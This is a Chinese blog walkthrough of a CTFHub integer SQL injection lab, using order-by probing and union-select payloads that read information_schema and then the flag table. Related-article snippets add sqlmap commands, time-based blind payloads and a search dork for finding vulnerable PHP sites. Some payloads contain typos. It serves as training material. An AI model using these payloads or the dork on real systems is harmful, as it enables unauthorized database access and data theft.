CTFHub-整形注入

最新推荐文章于 2024-03-01 20:40:00 发布
最新推荐文章于 2024-03-01 20:40:00 发布
阅读量308 收藏
点赞数 2
分类专栏: CTFHub 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51589948/article/details/116888773
版权

SQL整型注入

  1. 根据提示进行

    输入1
    在这里插入图片描述
    可得到该行数据为ctfhub

  2. 然后输入2 ,3 ,发现在输入数字中只有1,2回显,3不回显
    在这里插入图片描述在这里插入图片描述
    证明数据只有两行

  3. 之后观察该数据的列数情况
    输入1 order by 2
    1 order by 3
    在这里插入图片描述
    在这里插入图片描述
    由此可以判断出该数据中只有两列

  4. 由上述可知,该数据为两行两列,我们继续查询库名
    -1 union select1,database()
    在这里插入图片描述

数据库名为sqli

  1. 接下来查询数据库中数据表的名称
    -1 union select 1,gruop_concat(table_name)from information_schema.tables where table_schema=‘sqli’
    在这里插入图片描述

我们能知道sqli的数据库中的数据表名称分别为:news,flag

  1. 然后去查flag列的所有字段名
    -1 union select 1,group_concat(column_table) from information_schema.columns where table_schema=‘sqli’ and table_name=‘flag’
    在这里插入图片描述
  2. 然后直接在该库的表的列中查询flag
    -1 union select 1,group_concat(flag) from sqli.flag
    在这里插入图片描述
    得出flag
混混的小胖子233
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入-整型注入实例
OneOneZzzzzz
09-19 1135
发现存在SQL注入的站点有很多都是PHP,估计是PHP的占有率太大了,而且建站方便效率高,这就和ios和安卓一样,始终认为安卓安全性差,win和linux,mac一样,始终认为win的安全性差,毕竟占有率摆在这里 通过谷歌来搜索一些存在注入漏洞的网站,用谷歌hack语法来搜索:公司inurl:".php?id=" 结尾为公司,url中带有.php?id=的网页 那么我们来搜索下,我们就选择第一个 先加一个’测试一下,网页直接报错,从报错信息来看,是一个linux服务器,mysql的数据库 使用
CTFCTFHub------web-SQL注入-整数型注入
从零开始的网安生活
07-23 389
文章目录SQL注入整数型注入 SQL注入 整数型注入 1.打开链接根据提示输入1 1.先检查数据库有无注入点 python sqlmap.py -u http://challenge-7a209e58efdf655a.sandbox.ctfhub.com:10080/?id=1 得到 GET parameter 'id' is vulnerable. ...
ctfhub 整数型注入
plant1234的博客
06-16 994
整数型注入: 需要了解mysql的知识点: union select 联合查询,联合注入常用 database() 回显当前连接的数据库 version() 查看当前sql的版本如:mysql 1.2.3, mariadb-4.5.6 group_concat() 把产生的同一分组中的值用,连接,形成一个字符串 information_schema 存了很多mysql信息的数据库 information_schema.schemata information_schema库的一个表,名为schemata s
CTFHUB-整数型SQL注入
xixihahawuwu的博客
12-24 4343
CTFHUB-整数型SQL注入 根据提示输入1后发现页面回显并且url改变。由题可知此题为整数型注入 使用order by语句查询字段数 参数为3时不回显,说明字段数为2 使用union联合查询检测信息回显位置 id=1 union select 1,2 由于页面只允许返回一行内容,所以我们修改参数1为-1,使需要查询的信息回返 id=-1 union select 1,2 id=-1 union select 1,database() 获取当前数据库名 id=-1 union select 1,
CTFHUB-SQL整形注入
Web学习之路
03-06 178
SQL整形注入原理,一步步教会你SQL注入
CtfHub-wp(web)
01-23
本文主要探讨了CTF(Capture The Flag)竞赛中与Web安全相关的知识点,通过解决一系列问题,我们可以学习到如何发现和利用网站的漏洞获取关键信息。首先,提到了通过查找网站的备份文件来获取线索,例如在URL后添加...
ctf-all-in-one
01-30
ctf-all-in-one
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛中,可利用该工具自动识别编码类型并解码,快速解决misc类别的密码题目。 其他说明: 该工具具备智能判断密码...
CTFtools-SNOW.zip
11-03
Windows下SNOW隐写工具 snow.exe -C -m "被隐藏的信息“ -p "文件名
CTF指南-常规的CTF题目解析.pptx
10-12
CTF指南-常规的CTF题目解析
CTFHub(整数型注入
sGanYu
07-24 2201
目录 SQL注入的前提 手动注入 sqlmap注入 SQL注入的前提 判断是否具备注入条件 可控参数如id=1,能否影响页面的显示结果 输入SQL语句的时候,是否报错,能否通过报错,看到数据库回显的一些语句痕迹 尝试使输入的语句不报错,使得成功闭合语句 判断是什么类型的注入 语句能否被修改 是否能够成功执行 手动注入 首先判断是否存在注入,输入1回显,输入2回显,输入3,无回显 根据回显内容判断为整数型 开始爆字段id=1 order by 1,当id =1.
CTFHub | 整数型注入
尼泊罗河伯的博客
10-25 2489
根据题目描述输入 1 进行测试,发现此题可能存在 SQL 注入漏洞。那么使用' and 1 = 1 ‘和' and 1 = 2’进行判断,此题存在 SQL 整数型漏洞注入。那么第一步先判断字段数量,然后检查数据库位置,知道数据库位置后查看数据库版本和数据库名。接着查看一下全部数据库名,并查看这些数据库的表名,发现一个表名为 flag 比较可疑。查看这个表名的全部字段后接着查看表中的数据得到此题 flag 。
CTFHUB(六)之整数型注入
ScyLamb的博客
03-03 238
直接跑sqlmap sqlmap -u http://challenge-d2092f951b60f48a.sandbox.ctfhub.com:10080/?id=1 看到可注入 sqlmap -u http://challenge-d2092f951b60f48a.sandbox.ctfhub.com:10080/?id=1 --dbs 下意识选了sqli sqlmap -u http://...
ctfhub-web-sql-整型注入/字符型注入/报错注入/布尔盲注/时间盲注/mysql结构/cookie注入/ua注入
最新发布
2301_80162151的博客
03-01 795
id=1’ and sleep(5) --+,看网络有没有延迟,有的话就是存在时间盲注。(完全没变化的页面,这种情况我们可以利用时间函数来判断数据有没有在目标数据中得到执行。技能树的这些sql,肯定是存在,所以直接sqlmap获取库名。sqlmap -u url -D 库名 --tables。时间型的注入遇到的条件更为苛刻,数据交互完成以后目标网站。聚合函数也称作计数函数,返回查询对象的总数。判断页面是否正常,1=1和1=2是俩个页面。慢慢等一会,他有点慢,出现了库名sqli。函数 获取字符串的长度。
CTF hub 整数型注入
m0_63253040的博客
02-24 1210
尝试输入1,发现有回显 题目给出了查询语句,为整数型,再验证下 判断为整数型没错,若为字符型,则 select * from news where id = '1 and 1=1' select * from news where id = '1 and 1=2' 不会出现上述结果。 爆字段 发现2正常回显 3不显,只有2个字段 再看看数据库:sqli 3 union select 1,database() //3是为了先保证之前的数据查不出来 ...
ctfhub 整数型注入(手动注入
qq_54929891的博客
09-14 456
这段时间看了web安全里面有关sql注入以及一些博客,终于基本了解了一下如何做这种题目用手动注入 第一步,判断是否有注入点(构造sql语句来比对不同) 这是按照提示输入1回显结果,我们可以利用恒真恒假来判断是否修改语句有用 发现输入恒假1=2的时候没有回显,代表有注入点,可以改变sql语句 第二步 利用order by来获取回显的信息判断字段数(因为这个题目没有引号,加不加#省略号没有影响) 发现字段数为2,order by 3的时候没有回显利用1 and 1=2恒假语句来把原先的..
常规SQL注入(整型注入
hxhabcd123的博客
08-29 1505
常规SQL注入(整型注入
[CTFHub]整数型注入(web>SQL注入
ZXW_NUDT的博客
05-12 306
输入1后发现url改变 使用order by语句查询字段数 使用union联合查询检测信息回显位置 由于页面只允许返回一行内容,所以则修改参数1为-1,使需要查询的信息回返 获取当前数据库名 获取所有数据库名 查询数据库sqli表名 获取flag列所有字段名 获取指定数据库的表的列的内容 ...
CTFHUB——整数型SQL注入
陈艺秋的博客
01-14 1262
整型SQL注入
ctfhub-git泄露stash
09-13
根据引用和引用提供的信息,你可以尝试使用GitHack和dirsearch工具来扫描和利用ctfhub-git的泄露。首先,进入GitHack文件夹,执行命令"python GitHack.py ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值